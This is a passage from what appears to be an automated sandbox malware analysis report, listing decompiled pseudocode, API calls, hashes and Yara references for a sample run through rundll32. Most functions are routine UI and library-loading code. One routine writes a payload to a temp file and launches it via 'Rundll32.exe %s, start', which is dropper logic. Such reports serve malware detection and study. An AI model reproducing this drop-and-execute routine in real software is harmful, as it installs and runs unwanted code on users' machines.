                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 02801A4E
                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,0000F130,00000000,00000000,00000000), ref: 02801A5B
                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,0000F130,00000000,00000000,00000000), ref: 02801A68
                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,0000F130,00000000,00000000,00000000), ref: 02801A75
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$Delete$System
                          • String ID:
                          • API String ID: 2163645685-0
                          • Opcode ID: 0482f923bd5760e3c272a9c917eee1c16a26cd4bb9e60003586fa1e86f427fd1
                          • Instruction ID: 908cc155ff001f2c7998134be288fa48b3f5d4e526856928efa2f123d3a527b1
                          • Opcode Fuzzy Hash: 0482f923bd5760e3c272a9c917eee1c16a26cd4bb9e60003586fa1e86f427fd1
                          • Instruction Fuzzy Hash: 1101FB743413057EE761E768DC8DF697EEDDB08758F0480A0B54C9F6E2C7B4B9808A58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281CB70 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281CB70() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x2865b70 != 0) {
					_t10 =  *0x2865b70; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x2865b70 = 0;
				if( *0x2865b74 != 0) {
					_t2 =  *0x2865b6c; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x2865b68) {
						_t8 =  *0x2865b74; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x2865b74; // 0x0
					CloseHandle(_t5);
					 *0x2865b74 = 0;
					return 0;
				}
				return 0;
			}







                          0x0281cb77
                          0x0281cb79
                          0x0281cb7f
                          0x0281cb7f
                          0x0281cb86
                          0x0281cb92
                          0x0281cb94
                          0x0281cb9a
                          0x0281cbaa
                          0x0281cbae
                          0x0281cbb4
                          0x0281cbb4
                          0x0281cbb9
                          0x0281cbbf
                          0x0281cbc6
                          0x00000000
                          0x0281cbc6
                          0x0281cbcb

                          APIs
                          • UnhookWindowsHookEx.USER32(00000000), ref: 0281CB7F
                          • SetEvent.KERNEL32(00000000,0281F46C,?,?,0281F2C3), ref: 0281CB9A
                          • GetCurrentThreadId.KERNEL32 ref: 0281CB9F
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0281F46C,?,?,0281F2C3), ref: 0281CBB4
                          • CloseHandle.KERNEL32(00000000,00000000,0281F46C,?,?,0281F2C3), ref: 0281CBBF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                          • String ID:
                          • API String ID: 2429646606-0
                          • Opcode ID: b7f7a398df9c230e07f8afe336a7b738c59ee36a1a7f43cf734b251265dcd814
                          • Instruction ID: 3248d5d6c800ce6382f17cb07131adfb3816d4e41611968981176ae39c79dba1
                          • Opcode Fuzzy Hash: b7f7a398df9c230e07f8afe336a7b738c59ee36a1a7f43cf734b251265dcd814
                          • Instruction Fuzzy Hash: 51F0AEFDD802169ACB11EBB8E88CA0933BDB708B15B842E16E214CB1C0DB3E9460CF11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DB740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E027DB740(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x27db90a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E027D40E8(__edx);
				E027DB408(GetThreadLocale(), 0x27db920, 0x1009,  &_v12);
				if(E027D8620(0x27db920, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E027D43A8(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x286311c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E027D8CC8(_t124 + _t92 - 1, 2, 0x27db924);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E027D8CC8(_t124 + _t92 - 1, 4, 0x27db934);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E027D8CC8(_t124 + _t92 - 1, 2, 0x27db94c);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E027D43B0(_t122, 0x27db964);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E027D42D0();
												E027D43B0(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E027D43B0(_t122, 0x27db958);
										_t92 = _t92 + 1;
									}
								} else {
									E027D43B0(_t122, 0x27db944);
									_t92 = _t92 + 3;
								}
							} else {
								E027D43B0(_t122, 0x27db930);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E027DC800(_t124, _t92);
							E027D4608(_t124, _v8, _t92,  &_v20);
							E027D43B0(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x286574c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E027D413C(_t122, _t124);
					} else {
						while(_t92 <= E027D43A8(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E027D42D0();
									E027D43B0(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E027DB911);
				return E027D410C( &_v24, 4);
			}























                          0x027db740
                          0x027db745
                          0x027db746
                          0x027db747
                          0x027db748
                          0x027db749
                          0x027db74d
                          0x027db74f
                          0x027db753
                          0x027db754
                          0x027db759
                          0x027db75c
                          0x027db75f
                          0x027db766
                          0x027db77e
                          0x027db796
                          0x027db8e0
                          0x027db8e2
                          0x027db8e7
                          0x027db8e9
                          0x00000000
                          0x00000000
                          0x027db7ff
                          0x027db804
                          0x027db80b
                          0x027db849
                          0x027db84e
                          0x027db850
                          0x027db86f
                          0x027db874
                          0x027db876
                          0x027db897
                          0x027db89c
                          0x027db89e
                          0x027db8b3
                          0x027db8b3
                          0x027db8b5
                          0x027db8bb
                          0x027db8c2
                          0x027db8b7
                          0x027db8b7
                          0x027db8b9
                          0x027db8d0
                          0x027db8da
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027db8b9
                          0x027db8a0
                          0x027db8a7
                          0x027db8ac
                          0x027db8ac
                          0x027db878
                          0x027db87f
                          0x027db884
                          0x027db884
                          0x027db852
                          0x027db859
                          0x027db85e
                          0x027db85e
                          0x027db8df
                          0x027db8df
                          0x027db80d
                          0x027db816
                          0x027db824
                          0x027db82e
                          0x027db833
                          0x027db833
                          0x027db80b
                          0x027db79c
                          0x027db79c
                          0x027db7a1
                          0x027db7a4
                          0x027db7b2
                          0x027db7ae
                          0x027db7ae
                          0x027db7ae
                          0x027db7b6
                          0x027db7f1
                          0x027db7b8
                          0x027db7dd
                          0x027db7be
                          0x027db7be
                          0x027db7c0
                          0x027db7c2
                          0x027db7c4
                          0x027db7cd
                          0x027db7d7
                          0x027db7d7
                          0x027db7c4
                          0x027db7dc
                          0x027db7dc
                          0x027db7dc
                          0x027db7e8
                          0x027db7b6
                          0x027db8ef
                          0x027db8f1
                          0x027db8f4
                          0x027db8f7
                          0x027db909

                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,027DB90A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027DB76F
                            • Part of subcall function 027DB408: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: eeee$ggg$yyyy
                          • API String ID: 4232894706-1253427255
                          • Opcode ID: bcae02b04c14dfd9a38bc2a24b5d7b9c0c7cc937aa6ecd4eebcb14d6a44924b3
                          • Instruction ID: 003136c7803e94015c87af1b1f6c9927067bb547c48f6ea433a880da19ddf49e
                          • Opcode Fuzzy Hash: bcae02b04c14dfd9a38bc2a24b5d7b9c0c7cc937aa6ecd4eebcb14d6a44924b3
                          • Instruction Fuzzy Hash: F241F225B041468BD712AAB8D8997BFBBB7DB5430CB562426D441E3304EB35E902CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02826B9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E02826B9C(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x2864798; // 0x2865748
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E02826F20(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E02826F20(_t29) & 0x0000007f) << 0x0000000d) + ((E02826F20(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                          0x02826b9e
                          0x02826ba1
                          0x02826ba3
                          0x02826bac
                          0x02826bc3
                          0x02826bc5
                          0x02826bcc
                          0x02826bd8
                          0x02826bdc
                          0x02826bea
                          0x02826bf1
                          0x02826bf5
                          0x02826c07
                          0x02826c0c
                          0x02826c2a
                          0x02826c2e
                          0x02826c3c
                          0x02826c43
                          0x00000000
                          0x02826c49
                          0x02826c43
                          0x02826c0c
                          0x02826bf1
                          0x02826c56

                          APIs
                          • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02826BEA
                          • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02826C3C
                          • DrawMenuBar.USER32(00000000), ref: 02826C49
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: P
                          • API String ID: 3227129158-3110715001
                          • Opcode ID: e19bf649e8ff70b2ad20618ab8f651cbe0c62ab87c91ca4444cb81d4acb2d042
                          • Instruction ID: 750594959d605e0686eee11c98959690be493d67786d1a1e1da83cf981e69585
                          • Opcode Fuzzy Hash: e19bf649e8ff70b2ad20618ab8f651cbe0c62ab87c91ca4444cb81d4acb2d042
                          • Instruction Fuzzy Hash: 2711E7782052205FE320DF28CC84B4B7BD9EF84314F149628F098CB2D8E735C998CB86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D3B30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                          Download Yara Rule
                          C-Code - Quality: 86%
                          			E042D3B30(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v264;
				char _v524;
				char _v784;

				GetTempPathA(0x104,  &_v524);
				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
				if(E042D3AC0(_a4,  &_v264, _a4, _a8) != 1) {
					return 0;
				}
				_push(_a8);
				if(E042D33C0(_a4) != 1) {
					return E042D36C0( &_v264);
				}
				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
				return E042D36C0( &_v784);
			}






                          0x042d3b45
                          0x042d3b60
                          0x042d3b80
                          0x00000000
                          0x042d3bd7
                          0x042d3b85
                          0x042d3b95
                          0x00000000
                          0x042d3bd2
                          0x042d3baa
                          0x00000000

                          APIs
                          • GetTempPathA.KERNEL32(00000104,?), ref: 042D3B45
                          • GetTempFileNameA.KERNEL32(?,042D42C0,00000000,?), ref: 042D3B60
                            • Part of subcall function 042D3AC0: CreateFileA.KERNEL32(042D1691,40000000,00000000,00000000,00000002,00000080,00000000,042D1691), ref: 042D3AE6
                            • Part of subcall function 042D3AC0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 042D3B07
                            • Part of subcall function 042D3AC0: CloseHandle.KERNEL32(000000FF), ref: 042D3B11
                          • wsprintfA.USER32 ref: 042D3BAA
                            • Part of subcall function 042D36C0: CreateProcessA.KERNEL32(00000000,042D3BD2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 042D36F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                          • String ID: Rundll32.exe %s, start
                          • API String ID: 130250823-2967502992
                          • Opcode ID: 9908a90a31e60ff3ba0e1cf195def0224ff21e0d496c6e7f0fe503173bfe6e3d
                          • Instruction ID: dc83107175f978d1df8cca83c6ad6ec6f358c4877ae4701225193006880dfe0b
                          • Opcode Fuzzy Hash: 9908a90a31e60ff3ba0e1cf195def0224ff21e0d496c6e7f0fe503173bfe6e3d
                          • Instruction Fuzzy Hash: 79118CB9B201186BD714DF64FC85FE9737CDB44204F008694FE4A96141E675FB988F92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DD240 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DD240() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x2863140 = _t1;
				}
				if( *0x2863140 == 0) {
					 *0x2863140 = E027D8B14;
					return E027D8B14;
				}
				return _t1;
			}





                          0x027dd246
                          0x027dd24b
                          0x027dd24f
                          0x027dd257
                          0x027dd25c
                          0x027dd25c
                          0x027dd268
                          0x027dd26f
                          0x00000000
                          0x027dd26f
                          0x027dd275

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,027DDCA9,00000000,027DDCBC), ref: 027DD246
                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027DD257
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                          • API String ID: 1646373207-3712701948
                          • Opcode ID: 52ccfad5f5289f271a0108238b836783ab5791d44243bbe4b439ce1aa30ec661
                          • Instruction ID: ec80c5ecd5d8c63b49b7b72722a181252505fad070e05b4743fa604f715ed702
                          • Opcode Fuzzy Hash: 52ccfad5f5289f271a0108238b836783ab5791d44243bbe4b439ce1aa30ec661
                          • Instruction Fuzzy Hash: FDD0C7F6A80341DBFF319BE5748971776BDA735E45F002A65F04157141D774D4108621
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281FC98 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281FC98() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t6;

				_t4 = GetModuleHandleA("User32.dll");
				_v8 = _t4;
				if(_v8 != 0) {
					_t6 = GetProcAddress(_v8, "SetLayeredWindowAttributes");
					 *0x2863c88 = _t6;
					return _t6;
				}
				return _t4;
			}






                          0x0281fca1
                          0x0281fca6
                          0x0281fcad
                          0x0281fcb8
                          0x0281fcbd
                          0x00000000
                          0x0281fcbd
                          0x0281fcc4

                          APIs
                          • GetModuleHandleA.KERNEL32(User32.dll), ref: 0281FCA1
                          • GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 0281FCB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetLayeredWindowAttributes$User32.dll
                          • API String ID: 1646373207-2510956139
                          • Opcode ID: 844a78c1bdf0562497db25be40bd2f9ebb8335157a2fa7bac51820c01056a3c4
                          • Instruction ID: 32c58d1a3b2b4f3c1ad0ac1a83661f52417d19d557aea33a801fbe550402ad8b
                          • Opcode Fuzzy Hash: 844a78c1bdf0562497db25be40bd2f9ebb8335157a2fa7bac51820c01056a3c4
                          • Instruction Fuzzy Hash: 5BD05EBC944318BAFB00EBE4E50998D77BDD710610F10045AE60497680DA791A40EB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FEE20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027FEE20() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				if( *0x2865934 == 0) {
					_t1 = GetModuleHandleA("comctl32.dll");
					 *0x2865934 = _t1;
					if( *0x2865934 != 0) {
						_t2 =  *0x2865934; // 0x0
						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
						 *0x2865938 = _t3;
						return _t3;
					}
				}
				return _t1;
			}






                          0x027fee27
                          0x027fee2e
                          0x027fee33
                          0x027fee3f
                          0x027fee46
                          0x027fee4c
                          0x027fee51
                          0x00000000
                          0x027fee51
                          0x027fee3f
                          0x027fee56

                          APIs
                          • GetModuleHandleA.KERNEL32(comctl32.dll,027FEE91,00000200,02808FEE), ref: 027FEE2E
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 027FEE4C
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: InitCommonControlsEx$comctl32.dll
                          • API String ID: 1646373207-802336580
                          • Opcode ID: 5ee70c4ffcc4653d053ccd8c0ca798d8d0b18e386496f91b20c3b4254169874c
                          • Instruction ID: 61d5ab28c6d96c848c7cdfe96e31941227e4d99a61a926109f4adfbb04fe9db1
                          • Opcode Fuzzy Hash: 5ee70c4ffcc4653d053ccd8c0ca798d8d0b18e386496f91b20c3b4254169874c
                          • Instruction Fuzzy Hash: 87D067B9D87340DBF761AB74B58C72537A59384A26F813814D2459A290E77D0050CF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282B638 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E0282B638(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x2865bd0 != 0) {
					L3:
					_t49 =  *0x2865bb0; // 0x0
					_t50 =  *0x2865bb0; // 0x0
					_t117 = E0282B518(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x2865bd0 == 0) {
						_t168 =  *0x2865bd4;
						if( *0x2865bd4 != 0) {
							_t106 =  *0x2865bc4; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x2865bd4; // 0x0
							E0283597C(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x2865bb0; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x2865bd0;
						_t6 =  &_v24;
						 *_t6 =  *0x2865bd0 != 0;
						__eflags =  *_t6;
						 *0x2865bd0 = 2;
					} else {
						 *0x2865bd0 = 1;
						_v24 = 0;
					}
					_t54 =  *0x2865bb4; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x2865bb4; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						_t14 = _t155 + 4; // 0x0
						 *((intOrPtr*)(_t55 + 0x10)) =  *_t14;
						_t56 =  *0x2865bb4; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x2865bb4; // 0x0
							E0282D294( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x2865bb4; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t23 = _t155 + 4; // 0x0
						_t131 = E0282B568(2);
						_t121 =  *_t155;
						_t60 =  *0x2865bb4; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *_t23);
						if( *0x2865bd4 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x2865bd4; // 0x0
								E02835938(_t82, _t158);
								_t84 =  *0x2865bd4; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t30 = _t155 + 4; // 0x0
									_t121 =  *_t30;
									_t85 =  *0x2865bd4; // 0x0
									E02835A64(_t85,  *_t30,  *_t155, __eflags);
								} else {
									_t29 = _t155 + 4; // 0x0
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x2865bd4; // 0x0
									E0283597C(_t89, _t88, _t177,  *_t29);
								}
							} else {
								_t91 =  *0x2865bd4; // 0x0
								E02835AD8(_t91, _t131, __eflags);
								_t93 =  *0x2864774; // 0x2865b5c
								SetCursor(E0281C0D4( *_t93, _t158));
							}
						}
						_t62 =  *0x2864774; // 0x2865b5c
						_t65 = SetCursor(E0281C0D4( *_t62, _t158));
						if( *0x2865bd0 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E0282B5A4(_t121);
								_t67 =  *0x2865bb4; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0282D294(_t118,  &_v24, _t155);
									_t65 = E027D3408(_t118, __eflags);
									_t135 =  *0x2865bb4; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x2865bb4; // 0x0
									_t65 = E027D3408( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x2865bb4; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_t31 = _t155 + 4; // 0x0
								_push( *_t31);
								_t80 =  *0x2865bb4; // 0x0
								_t65 = E027D3408( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x2865bb4 == 0) {
								goto L32;
							} else {
								_t119 =  *0x2865bb4; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E027D8200(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x2865bb4; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x2865bb4; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x2865bb4; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E0282B568(1);
					if( *0x2865bb4 == 0) {
						goto L32;
					}
					_t102 =  *0x2865bb4; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x2865bb4; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x2865bb4; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					_t11 = _t155 + 4; // 0x0
					 *((intOrPtr*)(_t104 + 0x10)) =  *_t11;
					_t65 = E0282B568(0);
					if( *0x2865bb4 == 0) {
